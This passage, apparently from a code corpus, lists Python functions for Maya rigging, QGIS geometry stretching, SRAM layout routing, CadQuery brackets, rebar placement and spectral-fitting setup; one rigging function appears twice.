2)\n # connections.\n cmds.connectAttr(crvInfo + '.arcLength', mdnForSX + '.input1X', f=True)\n cmds.setAttr(mdnForSX + '.input2X', cmds.getAttr(mdnForSX + '.input1X'))\n scaledJoint = chain[:-1]\n for each in scaledJoint:\n cmds.connectAttr(mdnForSX + '.outputX', each + '.sx', f=True)\n # power connections.\n cmds.connectAttr(mdnForSX + '.outputX', mdnForPW + '.input1X', f=True)\n cmds.setAttr(mdnForPW + '.input2X', 0.5)\n cmds.connectAttr(mdnForPW + '.outputX', mdnForYZ + '.input2X', f=True)\n cmds.setAttr(mdnForYZ + '.input1X', 1)\n for each in scaledJoint:\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sy')\n cmds.connectAttr(mdnForYZ + '.outputX', each + '.sz')\n # TODO: need to full proof this function.", "def gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n obj = qad_utils.whatGeomIs(0, geom)\n if (type(obj) != list and type(obj) != tuple):\n objType = 
obj.whatIs()\n if objType == \"CIRCLE\": # se é cerchio\n newCircle = gripStretchCircle(obj, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newCircle is not None:\n return QgsGeometry.fromPolyline(newCircle.asPolyline(tolerance2ApproxCurve))\n elif objType == \"ARC\": # se é arco\n newArc = gripStretchArc(obj, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n if newArc is not None:\n return QgsGeometry.fromPolyline(newArc.asPolyline(tolerance2ApproxCurve))\n return None\n \n linearObjectListToStretch = qad_utils.QadLinearObjectList()\n linearObjectListToStretch.fromPolyline(geom.asPolyline())\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n \n pts = linearObjectListToStretch.asPolyline(tolerance2ApproxCurve)\n stretchedGeom = QgsGeometry.fromPolyline(pts) \n \n return stretchedGeom", "def route_bitlines(self):\n # adds the BL on metal 2\n offset = vector(self.bitcell.get_pin(self.bitcell_bl).cx(),0) - vector(0.5 * self.m2_width,0)\n self.add_layout_pin(text=\"bl\",\n layer=\"metal2\",\n offset=offset,\n width=drc['minwidth_metal2'],\n height=self.height)\n\n # adds the BR on metal 2\n offset = vector(self.bitcell.get_pin(self.bitcell_br).cx(),0) - vector(0.5 * self.m2_width,0)\n self.add_layout_pin(text=\"br\",\n layer=\"metal2\",\n offset=offset,\n width=drc['minwidth_metal2'],\n height=self.height)", "def __init__(self, workplane, measures):\n\n cq.Workplane.bracket = utilities.bracket\n cq.Workplane.transformedWorkplane = utilities.transformedWorkplane\n cq.Workplane.bolt = utilities.bolt\n cq.Workplane.cutEachAdaptive = utilities.cutEachAdaptive\n\n self.model = workplane\n self.debug = False\n self.measures = measures\n m = self.measures\n\n # The bracket lengths are measured at the outside, but the construction actually uses a \n # central cuboid block with two attached brackets. 
Adapting the measures accordingly.\n m.center_block = Measures(\n # Naming is as seen from the horizontal leg.\n width = max(m.horizontal_leg.width, m.vertical_leg.width),\n depth = m.vertical_leg.height,\n height = m.horizontal_leg.height\n )\n m.horizontal_leg.depth -= m.center_block.depth\n m.vertical_leg.depth -= m.center_block.height\n\n # Create hole specs which combine the other hole measures in the format expected by bolthole().\n m.horizontal_leg.hole_specs = [\n {\n \"diameter\": m.horizontal_leg.hole_diameters[i] if isinstance(m.horizontal_leg.hole_diameters, list) else m.horizontal_leg.hole_diameters,\n \"clamp_length\": m.horizontal_leg.clamp_lengths[i] if isinstance(m.horizontal_leg.clamp_lengths, list) else m.horizontal_leg.clamp_lengths, \n \"nuthole_size\": m.horizontal_leg.nuthole_sizes[i] if isinstance(m.horizontal_leg.nuthole_sizes, list) else m.horizontal_leg.nuthole_sizes, \n \"nuthole_depth\": 1.1 * m.vertical_leg.depth # Just choose something large enough for cutting. \n }\n for i in range(m.horizontal_leg.hole_count)\n ]\n m.vertical_leg.hole_specs = [\n {\n \"diameter\": m.vertical_leg.hole_diameters[i] if isinstance(m.vertical_leg.hole_diameters, list) else m.vertical_leg.hole_diameters,\n \"clamp_length\": m.vertical_leg.clamp_lengths[i] if isinstance(m.vertical_leg.clamp_lengths, list) else m.vertical_leg.clamp_lengths, \n \"nuthole_size\": m.vertical_leg.nuthole_sizes[i] if isinstance(m.vertical_leg.nuthole_sizes, list) else m.vertical_leg.nuthole_sizes, \n \"nuthole_depth\": 1.1 * m.horizontal_leg.depth # Just choose something large enough for cutting. \n }\n for i in range(m.vertical_leg.hole_count)\n ]\n\n # TODO: Initialize missing measures with defaults.\n\n self.build()", "def blockScale_bake(self,sizeMethod = 'axisSize',force=False,):\n try:\n _str_func = 'bake_blockScale'\n log.debug(cgmGEN.logString_start(_str_func))\n str_self = self.mNode\n \n if self.p_parent:\n return log.error(cgmGEN.logString_msg(_str_func, \"Can't bake parented blocks, please unparent\"))\n \n _blockScale = self.blockScale\n \n if MATH.is_float_equivalent(_blockScale,1):\n log.debug(cgmGEN.logString_msg(_str_func, 'Already 1.0'))\n return True\n \n if self.hasAttr('baseSize'):\n _baseSize = True\n for a in 'xyz':\n if ATTR.is_connected(str_self,'baseSize'+a.capitalize()):\n _baseSize=False\n break\n if _baseSize:\n log.info(cgmGEN.logString_msg(_str_func, 'baseSize buffer. 
Not connected'))\n self.baseSize = baseSize_get(self)\n \n _factor = 1.0/_blockScale\n \n ml_ctrls = controls_get(self, define=True, form=True, prerig=True)\n md_dat = {}\n \n log.debug(cgmGEN.logString_sub(_str_func, 'Gather Dat'))\n #First Loop gateher\n for i,mCtrl in enumerate(ml_ctrls):\n _str = mCtrl.p_nameShort\n _d = {'str':_str}\n \n if not ATTR.is_locked(_str,'translate'):\n _d['pos']=mCtrl.p_position\n \n _d['lossyScale'] = TRANS.scaleLossy_get(_str)\n _d['worldScale'] = mc.xform(_str, q=True, scale = True, worldSpace = True, absolute = True)\n _d['factorScale'] = [v*_factor for v in _d['worldScale']]\n \n _d['noParent'] = False\n if ATTR.is_locked(_str,'translate'):\n _d['noParent'] = True\n \n \n for a in ['sx','sy','sz']:\n if not ATTR.is_locked(_str,a):\n v = ATTR.get(_str,a)\n #if not MATH.is_float_equivalent(1.0,v):\n _d[a] = v * _blockScale\n if not _d.get('axisSize'):\n _d['axisSize'] = DIST.get_axisSize(_str)\n if not _d.get('bbSize'):\n _d['bbSize'] = TRANS.bbSize_get(_str)\n \n md_dat[i] = _d\n \n \n #pprint.pprint(md_dat)\n #return\n log.debug(cgmGEN.logString_msg(_str_func, 'Setting intiial'))\n ATTR.set(self.mNode,'blockScale',1.0)\n \"\"\"\n blockDat_save(self)\n blockDat_load(self,redefine=True) \n ml_ctrls = controls_get(self, define=True, form=True, prerig=True) \n \"\"\"\n \n for ii in range(3):#3 loop to account for parentage\n log.debug(cgmGEN.logString_sub(_str_func, 'Push: {0}'.format(ii)))\n\n for i,mCtrl in enumerate(ml_ctrls):\n _d = md_dat[i]\n log.debug(cgmGEN.logString_msg(_str_func, \"{0} | {1}\".format(_d['str'],_d)))\n _pos = _d.get('pos')\n _noParent = _d['noParent']\n \n if _pos:mCtrl.p_position = _pos\n \n \n _worldScale = _d.get('worldScale')\n if _worldScale and _noParent is not True:\n mParent = mCtrl.p_parent\n if mParent:\n mCtrl.p_parent = False\n \n #mc.xform(mCtrl.mNode, scale = _worldScale, objectSpace = True, absolute = True)\n mc.xform(mCtrl.mNode, scale = _worldScale, worldSpace = True, absolute = True)\n \n if mParent:mCtrl.p_parent = mParent\n else:\n if not ATTR.is_locked(mCtrl.mNode,'scale'):\n \"\"\"\n _worldScale = _d.get('factorScale')\n if _worldScale:\n mc.xform(_str, scale = _worldScale, worldSpace = True, )#absolute = True\n \n for a in ['sx','sy','sz']:\n if _d.get(a):\n ATTR.set(_d['str'],a,_d[a])\"\"\"\n \n if sizeMethod == 'axisSize':\n if _d.get('axisSize'):\n try:\n DIST.scale_to_axisSize(_d['str'],_d['axisSize'])\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n elif sizeMethod in ['bb','bbSize']:\n if _d.get('bbSize'):\n try:\n #reload(TRANS)\n TRANS.scale_to_boundingBox(_d['str'],_d['bbSize'],freeze=False)\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n \"\"\"\n if ii == 0:\n _worldScale = _d.get('factorScale')\n if _worldScale:\n mc.xform(_str, scale = _worldScale, worldSpace = True, )#absolute = True\n \n for a in ['sx','sy','sz']:\n if _d.get(a):\n ATTR.set(_d['str'],a,_d[a])\n \n if sizeMethod == 'axisSize':\n if _d.get('axisSize'):\n try:\n DIST.scale_to_axisSize(_d['str'],_d['axisSize'])\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n elif sizeMethod in ['bb','bbSize']:\n if _d.get('bbSize'):\n try:\n reload(TRANS)\n TRANS.scale_to_boundingBox(_d['str'],_d['bbSize'],freeze=False)\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to 
axisSize {1}\".format(_d['str'],err)))\"\"\" \n #Fix the root shape\n #if not ATTR.is_connected(self.mNode,'baseSize'):\n #log.info(cgmGEN.logString_sub(_str_func, 'Base size buffer'))\n \n rootShape_update(self)\n #pprint.pprint(vars())\n return True \n except Exception,err:\n cgmGEN.cgmExceptCB(Exception,err)", "def blockScale_bake(self,sizeMethod = 'axisSize',force=False,):\n try:\n _str_func = 'bake_blockScale'\n log.debug(cgmGEN.logString_start(_str_func))\n str_self = self.mNode\n \n if self.p_parent:\n return log.error(cgmGEN.logString_msg(_str_func, \"Can't bake parented blocks, please unparent\"))\n \n _blockScale = self.blockScale\n \n if MATH.is_float_equivalent(_blockScale,1):\n log.debug(cgmGEN.logString_msg(_str_func, 'Already 1.0'))\n return True\n \n if self.hasAttr('baseSize'):\n _baseSize = True\n for a in 'xyz':\n if ATTR.is_connected(str_self,'baseSize'+a.capitalize()):\n _baseSize=False\n break\n if _baseSize:\n log.info(cgmGEN.logString_msg(_str_func, 'baseSize buffer. Not connected'))\n self.baseSize = baseSize_get(self)\n \n _factor = 1.0/_blockScale\n \n ml_ctrls = controls_get(self, define=True, form=True, prerig=True)\n md_dat = {}\n \n log.debug(cgmGEN.logString_sub(_str_func, 'Gather Dat'))\n #First Loop gateher\n for i,mCtrl in enumerate(ml_ctrls):\n _str = mCtrl.p_nameShort\n _d = {'str':_str}\n \n if not ATTR.is_locked(_str,'translate'):\n _d['pos']=mCtrl.p_position\n \n _d['lossyScale'] = TRANS.scaleLossy_get(_str)\n _d['worldScale'] = mc.xform(_str, q=True, scale = True, worldSpace = True, absolute = True)\n _d['factorScale'] = [v*_factor for v in _d['worldScale']]\n \n _d['noParent'] = False\n if ATTR.is_locked(_str,'translate'):\n _d['noParent'] = True\n \n \n for a in ['sx','sy','sz']:\n if not ATTR.is_locked(_str,a):\n v = ATTR.get(_str,a)\n #if not MATH.is_float_equivalent(1.0,v):\n _d[a] = v * _blockScale\n if not _d.get('axisSize'):\n _d['axisSize'] = DIST.get_axisSize(_str)\n if not _d.get('bbSize'):\n _d['bbSize'] = TRANS.bbSize_get(_str)\n \n md_dat[i] = _d\n \n \n #pprint.pprint(md_dat)\n #return\n log.debug(cgmGEN.logString_msg(_str_func, 'Setting intiial'))\n ATTR.set(self.mNode,'blockScale',1.0)\n \"\"\"\n blockDat_save(self)\n blockDat_load(self,redefine=True) \n ml_ctrls = controls_get(self, define=True, form=True, prerig=True) \n \"\"\"\n \n for ii in range(3):#3 loop to account for parentage\n log.debug(cgmGEN.logString_sub(_str_func, 'Push: {0}'.format(ii)))\n\n for i,mCtrl in enumerate(ml_ctrls):\n _d = md_dat[i]\n log.debug(cgmGEN.logString_msg(_str_func, \"{0} | {1}\".format(_d['str'],_d)))\n _pos = _d.get('pos')\n _noParent = _d['noParent']\n \n if _pos:mCtrl.p_position = _pos\n \n \n _worldScale = _d.get('worldScale')\n if _worldScale and _noParent is not True:\n mParent = mCtrl.p_parent\n if mParent:\n mCtrl.p_parent = False\n \n #mc.xform(mCtrl.mNode, scale = _worldScale, objectSpace = True, absolute = True)\n mc.xform(mCtrl.mNode, scale = _worldScale, worldSpace = True, absolute = True)\n \n if mParent:mCtrl.p_parent = mParent\n else:\n if not ATTR.is_locked(mCtrl.mNode,'scale'):\n \"\"\"\n _worldScale = _d.get('factorScale')\n if _worldScale:\n mc.xform(_str, scale = _worldScale, worldSpace = True, )#absolute = True\n \n for a in ['sx','sy','sz']:\n if _d.get(a):\n ATTR.set(_d['str'],a,_d[a])\"\"\"\n \n if sizeMethod == 'axisSize':\n if _d.get('axisSize'):\n try:\n DIST.scale_to_axisSize(_d['str'],_d['axisSize'])\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize 
{1}\".format(_d['str'],err)))\n elif sizeMethod in ['bb','bbSize']:\n if _d.get('bbSize'):\n try:\n reload(TRANS)\n TRANS.scale_to_boundingBox(_d['str'],_d['bbSize'],freeze=False)\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n \"\"\"\n if ii == 0:\n _worldScale = _d.get('factorScale')\n if _worldScale:\n mc.xform(_str, scale = _worldScale, worldSpace = True, )#absolute = True\n \n for a in ['sx','sy','sz']:\n if _d.get(a):\n ATTR.set(_d['str'],a,_d[a])\n \n if sizeMethod == 'axisSize':\n if _d.get('axisSize'):\n try:\n DIST.scale_to_axisSize(_d['str'],_d['axisSize'])\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\n elif sizeMethod in ['bb','bbSize']:\n if _d.get('bbSize'):\n try:\n reload(TRANS)\n TRANS.scale_to_boundingBox(_d['str'],_d['bbSize'],freeze=False)\n except Exception,err:\n log.warning(cgmGEN.logString_msg(_str_func, \"{0} | failed to axisSize {1}\".format(_d['str'],err)))\"\"\" \n #Fix the root shape\n #if not ATTR.is_connected(self.mNode,'baseSize'):\n #log.info(cgmGEN.logString_sub(_str_func, 'Base size buffer'))\n \n rootShape_update(self)\n #pprint.pprint(vars())\n return True \n except Exception,err:\n cgmGEN.cgmExceptCB(Exception,err)", "def gripStretchQgsGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n wkbType = geom.wkbType()\n if wkbType == QGis.WKBPoint or wkbType == QGis.WKBPoint25D:\n pt = stretchPoint(geom.asPoint(), ptListToStretch, offSetX, offSetY)\n if pt is not None:\n return QgsGeometry.fromPoint(pt)\n \n if wkbType == QGis.WKBMultiPoint:\n stretchedGeom = QgsGeometry(geom)\n points = stretchedGeom.asMultiPoint() # vettore di punti\n atSubGeom = 0\n for pt in points:\n subGeom = QgsGeometry.fromPoint(pt)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n\n if wkbType == QGis.WKBLineString:\n return gripStretchQgsLineStringGeometry(geom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n \n if wkbType == QGis.WKBMultiLineString:\n stretchedGeom = QgsGeometry(geom)\n lines = stretchedGeom.asMultiPolyline() # lista di linee\n atSubGeom = 0\n for line in lines: \n subGeom = QgsGeometry.fromPolyline(line)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n if wkbType == QGis.WKBPolygon:\n stretchedGeom = QgsGeometry(geom)\n lines = stretchedGeom.asPolygon() # lista di linee\n atSubGeom = 0\n for line in lines: \n subGeom = QgsGeometry.fromPolyline(line)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n if wkbType == QGis.WKBMultiPolygon:\n stretchedGeom = QgsGeometry(geom)\n polygons = geom.asMultiPolygon() # vettore di poligoni\n atSubGeom = 0\n for polygon in polygons:\n subGeom = QgsGeometry.fromPolygon(polygon)\n stretchedSubGeom = gripStretchQgsGeometry(subGeom, basePt, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve)\n 
stretchedGeom = qad_utils.setSubGeom(stretchedGeom, stretchedSubGeom, [atSubGeom]) \n atSubGeom = atSubGeom + 1\n return stretchedGeom\n \n return None", "def gripStretchQgsLinearObjectList(linearObjectList, ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve):\n linearObjectListToStretch = qad_utils.QadLinearObjectList(linearObjectList)\n \n atPart = 0\n while atPart < linearObjectListToStretch.qty():\n linearObject = linearObjectListToStretch.getLinearObjectAt(atPart) \n if linearObject.isSegment():\n pt = linearObject.getStartPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto iniziale \n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setStartPt(pt)\n \n pt = linearObject.getEndPt()\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n # cambio punto finale\n pt.setX(pt.x() + offSetX)\n pt.setY(pt.y() + offSetY)\n linearObject.setEndPt(pt)\n else: # se è arco\n newArc, newInverseFlag = gripStretchArc(linearObject.getArc(), ptListToStretch, offSetX, offSetY, tolerance2ApproxCurve, linearObject.isInverseArc())\n if newArc is None:\n return None\n linearObject.setArc(newArc, newInverseFlag)\n\n atPart = atPart + 1\n \n pt = linearObjectListToStretch.getCentroid(tolerance2ApproxCurve) # verifico se polilinea ha un centroide\n if pt is not None:\n if isPtContainedForStretch(pt, ptListToStretch): # se il punto è contenuto in ptListToStretch\n linearObjectListToStretch.move(offSetX, offSetY)\n\n return linearObjectListToStretch", "def place_rebar_long_flex(as_req, width, cover, link_d, d, spacing):\r\n \"\"\"as_req - required area of steel\"\"\"\r\n \"\"\"width - beam width; cover - beam side cover; link_d; shear link diameter in millimeters\"\"\"\r\n \"\"\"d - diameter of bar; spacing - minimum spacing of bars\"\"\"\r\n\r\n layer = [2] # initialize vector that stores number of bottom bars (minimum 2)\r\n as_ = layer[-1] * d ** 2 * np.pi / 4 # determine current area of reinforcement\r\n\r\n while as_ < as_req: # while amount of reinforcement of the beam is less than required\r\n layer[-1] = layer[-1] + 1 # add one bar\r\n # evaluate distance between bars\r\n d_axis_b = (int(width) - 2 * cover - 2 * link_d - d) / (int(layer[-1]) - 1) # distance between bar axis\r\n d_bars_b = d_axis_b - d # distance between bars\r\n\r\n if d_bars_b < spacing: # in case bars are spaced less than spacing variable\r\n layer[-1] = layer[-1] - 1 # go back to previous number of bars\r\n layer.append(2) # add another layer of bars with minimum of 2 bars\r\n\r\n as_ = sum(layer) * d ** 2 * np.pi / 4 # update current area of reinforcement\r\n\r\n rebar = []\r\n\r\n for i in range(len(layer)):\r\n layers_list = [layer[i], d]\r\n rebar.append(layers_list)\r\n\r\n return rebar", "def build_rig(self):\n\n # create rig part top nodes\n self.create_part_master()\n\n # Get all the relevant part info\n prefix = self.prefix\n options = self.options\n anim_ctrls = self.anim_ctrls\n bind_jnts = self.bind_joints\n hooks = self.hooks\n ctrl_grps = self.ctrl_grps\n jnt_grps = self.jnt_grps\n\n mirror = self.mirror_value\n\n parent = options.get('parent')\n squash_stretch = options.get('squashStretch')\n aimDownBone = options.get('aimDownBone')\n single_joint = options.get('singleJoint')\n number_joints = options.get('numberJoints')\n pickWalk_parent = options.get('pickWalkParent')\n\n # Create ctrls\n zeros, ctrls, offsets, last_nodes = [], [], [], []\n\n for i, ctrl_name in enumerate(anim_ctrls):\n 
zero, ctrl, offCtrls, last_node = self.anim_ctrl(ctrl_name)\n zeros.append(zero)\n ctrls.append(ctrl)\n offsets.append(offCtrls)\n last_nodes.append(last_node)\n\n #Setup pickwaliking attributes for the fingers\n i = 0\n ctrls.reverse()\n for ctrl in ctrls:\n\n if i+1 < len(ctrls):\n\n pickWalk.attribute_tag(ctrls[i],ctrls[i+1])\n else:\n pickWalk.attribute_tag(ctrls[i],pickWalk_parent)\n break\n\n i+=1\n ctrls.reverse()\n\n if len(ctrls) > 1:\n for i in range(1, len(ctrls), 1):\n mc.parent(zeros[i], last_nodes[i-1])\n\n # constraint jnts\n if len(bind_jnts) > 2:\n\n # point and aim/orient contraint all joints down the chain based on the\n for i in range(len(last_nodes)-1):\n mc.pointConstraint(last_nodes[i], bind_jnts[i], mo=1, n=bind_jnts[i]+'_pc')\n if not squash_stretch:\n mc.scaleConstraint(last_nodes[i], bind_jnts[i], mo=1, n=bind_jnts[i]+'_sc')\n\n if i < len(last_nodes)-1:\n print aimDownBone\n if aimDownBone:\n mc.aimConstraint(last_nodes[i+1],\n bind_jnts[i],\n aim=[mirror,0,0],\n u=[0,1,0],\n wu=[0,1,0],\n wut='objectRotation',\n wuo=last_nodes[i],\n mo=1, n=bind_jnts[i]+'_ac')\n if aimDownBone == False:\n mc.orientConstraint(last_nodes[i],bind_jnts[i],n=bind_jnts[i]+'_oc')\n\n #parent constrain the last joint ot the last ctrl\n # mc.parentConstraint(last_nodes[-1], bind_jnts[-2], mo=1, n=bind_jnts[-2]+'_prc')\n # mc.parentConstraint(last_nodes[-1], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_prc')\n\n # if not squash_stretch:\n # mc.scaleConstraint(last_nodes[-1], bind_jnts[-2], mo=1, n=bind_jnts[-2]+'_sc')\n # mc.scaleConstraint(last_nodes[-1], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_sc')\n\n elif single_joint or number_joints == 1:\n mc.parentConstraint(last_nodes[0], bind_jnts[0], mo=1, n=bind_jnts[0]+'_prc')\n mc.scaleConstraint(last_nodes[0], bind_jnts[0], mo=1, n=bind_jnts[0]+'_sc')\n\n else:\n if squash_stretch:\n spline.preserve_volume(ctrls, bind_jnts[:-1], ctrls[0], attrs=['sy','sz'])\n\n mc.parentConstraint(bind_jnts[-2], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_prc')\n mc.scaleConstraint(bind_jnts[-2], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_sc')\n\n mc.parent(zeros[0], ctrl_grps[0])\n mc.parent(bind_jnts, jnt_grps[0])\n\n if not single_joint and number_joints == 1:\n mc.parent(bind_jnts[-1], bind_jnts[0])\n\n #utils.create_cfx_curves(self.bind_joints, self.prefix+'_'+self.part_type)\n\n if len(ctrls) > 1:\n spaces.tag(ctrls, arg='partParent:'+self.options.get('parent'))\n else:\n spaces.tag(ctrls)\n\n self.finalize_part()", "def bndy_plasma(self):\n self.ne[0], self.ne[-1] = 1e11, 1e11\n self.ni[0], self.ni[-1] = 1e11, 1e11\n self.nn[0], self.nn[-1] = 1e11, 1e11\n self.Te[0], self.Te[-1] = 0.1, 0.1\n self.Ti[0], self.Ti[-1] = 0.01, 0.01\n # self.coll_em[0], self.coll_em[-1] = 1e5, 1e5\n # self.coll_im[0], self.coll_im[-1] = 1e5, 1e5", "def prepare_blockages(self, pin_name):\n debug.info(3,\"Preparing blockages.\")\n \n # Start fresh. 
Not the best for run-time, but simpler.\n self.clear_blockages()\n # This adds the initial blockges of the design\n #print(\"BLOCKING:\",self.blocked_grids)\n self.set_blockages(self.blocked_grids,True)\n\n # Block all of the supply rails (some will be unblocked if they're a target)\n self.set_supply_rail_blocked(True)\n \n # Block all of the pin components (some will be unblocked if they're a source/target)\n # Also block the previous routes\n for name in self.pin_groups:\n blockage_grids = {y for x in self.pin_groups[name] for y in x.grids}\n self.set_blockages(blockage_grids,True)\n blockage_grids = {y for x in self.pin_groups[name] for y in x.blockages}\n self.set_blockages(blockage_grids,True)\n\n # FIXME: These duplicate a bit of work\n # These are the paths that have already been routed.\n self.set_blockages(self.path_blockages)\n\n # Don't mark the other components as targets since we want to route\n # directly to a rail, but unblock all the source components so we can\n # route over them\n blockage_grids = {y for x in self.pin_groups[pin_name] for y in x.grids}\n self.set_blockages(blockage_grids,False)", "def setup_layout_constants(self):\n # determines the spacing between the edge and nmos (rail to active\n # metal or poly_to_poly spacing)\n half_gate_to_gate = 0.5 * (drc[\"poly_to_poly\"] - drc[\"minwidth_metal1\"])\n edge_to_nmos = max(drc[\"metal1_to_metal1\"] - self.nmos.active_contact_positions[0].y,\n half_gate_to_gate - self.nmos.poly_positions[0].y)\n\n # determine the position of the first transistor from the left\n self.nmos_position1 = vector(0,\n 0.5 * drc[\"minwidth_metal1\"] + edge_to_nmos)\n offset = self.nmos_position1 + vector(0,self.nmos.height)\n\n x = vector(self.nmos.active_width - self.nmos.active_contact.width, 0)\n self.nmos_position2 = x + self.nmos_position1.scale(0,1)\n\n # determines the spacing between the edge and pmos\n edge_to_pmos = max(drc[\"metal1_to_metal1\"] - self.pmos.active_contact_positions[0].y,\n half_gate_to_gate - self.pmos.poly_positions[0].y)\n self.pmos_position1 = vector(0,\n self.height - 0.5 * drc[\"minwidth_metal1\"]\n - edge_to_pmos - self.pmos.height)\n self.pmos_position2 = self.pmos_position1 + vector(self.pmos.width,0)\n\n self.well_width = max(self.pmos_position2.x + self.pmos.active_position.x\n + self.pmos.active_width\n + drc[\"active_to_body_active\"] + self.nwell_contact.width \n + drc[\"well_enclosure_active\"],\n self.nmos_position2.x + self.nmos.active_position.x \n + self.nmos.active_width \n + drc[\"active_to_body_active\"] + drc[\"well_enclosure_active\"])\n self.width = self.well_width", "def setup_fitting_init_pars(inparam, night, band, masterbeam, order):\n\n # Determine whether IGRINS mounting was loose or\n # the night of interest is in question\n if (int(night) < 20180401) or (int(night) > 20190531):\n IPpars = inparam.ips_tightmount_pars[band][masterbeam][order]\n else:\n IPpars = inparam.ips_loosemount_pars[band][masterbeam][order]\n\n # start at bucket loc = 1250 +- 100, width = 250 +- 100,\n # depth = 100 +- 5000 but floor at 0\n centerloc = 1250 if band == 'H' else 1180\n\n # Initialize parameter array for optimization as well as half-range values\n # for each parameter during the various steps of the optimization.\n # Many of the parameters initialized here will be changed throughout the\n # code before optimization and in between optimization steps.\n\n parA0 = np.array([\n 0.0, # 0: The shift of the stellar template (km/s)\n 0.0, # 1: The scale factor for the stellar template\n 0.0, # 2: The shift 
of the telluric template (km/s)\n 1.0, # 3: The scale factor for the telluric template\n 0.0, # 4: vsini (km/s)\n IPpars[2], # 5: The instrumental resolution (FWHM) in pixels\n 0.0, # 6: Wavelength 0-pt\n 0.0, # 7: Wavelength linear component\n 0.0, # 8: Wavelength quadratic component\n 0.0, # 9: Wavelength cubic component\n 1.0, #10: Continuum zero point\n 0.0, #11: Continuum linear component\n 0.0, #12: Continuum quadratic component\n IPpars[1], #13: Instrumental resolution linear component\n IPpars[0], #14: Instrumental resolution quadratic component\n centerloc, #15: Blaze dip center location\n 330, #16: Blaze dip full width\n 0.05, #17: Blaze dip depth\n 90, #18: Secondary blaze dip full width\n 0.05, #19: Blaze dip depth\n 0.0, #20: Continuum cubic component\n 0.0, #21: Continuum quartic component\n 0.0, #22: Continuum quintic component\n 0.0, #23: Continuum hexic component\n 0.0, #24: secondary par\n 0.0, #25: secondary par\n 0.0, #26: secondary par\n 0.0 #27: secondary par\n ])\n\n return parA0", "def prepare(info_dict):\n\n logger.info(\"\\n-=# Chain optimization cycle 0 #=- \\n\")\n params, M, engine, result, _ = get_basic_info(info_dict)\n\n logger.info(\"Spring Force: %.2f kcal/mol/Ang^2 \\n\" % params.nebk)\n\n tmpdir = tempfile.mkdtemp()\n\n # Getting the initial chain.\n chain = ElasticBand(M, engine=engine, tmpdir=tmpdir, params=params, plain=params.plain)\n\n trust = params.trust\n chain.ComputeChain(result=result)\n chain.ComputeGuessHessian(blank=isinstance(engine, Blank))\n chain.PrintStatus()\n\n avgg_print, maxg_print = print_forces(chain, params.avgg, params.maxg)\n logger.info(\"-= Chain Properties =- \\n\")\n logger.info(\n \"@\\n%13s %13s %13s %13s %11s %13s %13s \\n\"\n % (\"GAvg(eV/Ang)\", \"GMax(eV/Ang)\", \"Length(Ang)\", \"DeltaE(kcal)\", \"RMSD(Ang)\", \"TrustRad(Ang)\", \"Step Quality\")\n )\n logger.info(\n \"@%13s %13s %13s \\n\"\n % (\n \" %s \" % avgg_print,\n 